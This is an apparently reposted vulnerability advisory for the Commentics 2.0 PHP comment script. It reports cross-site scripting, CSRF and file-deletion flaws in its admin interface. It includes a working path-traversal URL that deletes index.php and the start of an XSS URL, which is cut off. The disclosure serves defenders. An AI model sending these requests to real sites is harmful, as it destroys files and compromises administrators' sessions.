19325_commentics 2.0-多个漏洞-PHP WebApps exploit.txt

详情

#################################################
Commentics 2.0 <= Multiple Vulnerabilities
#################################################  Discovered by: Jean Pascal Pereira  Vendor information:  "Commentics is a free, advanced PHP comment script with many features.
Professionally written and with open source code, its main aims are to be integrable, customizable and secure."  Vendor URI: http://www.commentics.org/  #################################################  Issues: Cross Site Scripting, Cross Site Request Forgery / File Deletion  Risk-level: High  The whole administration interface is prone to several client-side attacks.  -------------------------------------  Exploit / Proof Of Concept:  (Note that almost every parameter is vulnerable. These are only a few examples.)  1. File deletion vulnerability (deletes index.php):  http://localhost/commentics/commentics/comments/[admin_path]/index.php?page=tool_db_backup&action=delete&id=../index.php  2. Cross Site Scripting:  http://localhost/commentics/commentics/comments/[admin_path]/index.php?page=edit_page&id=">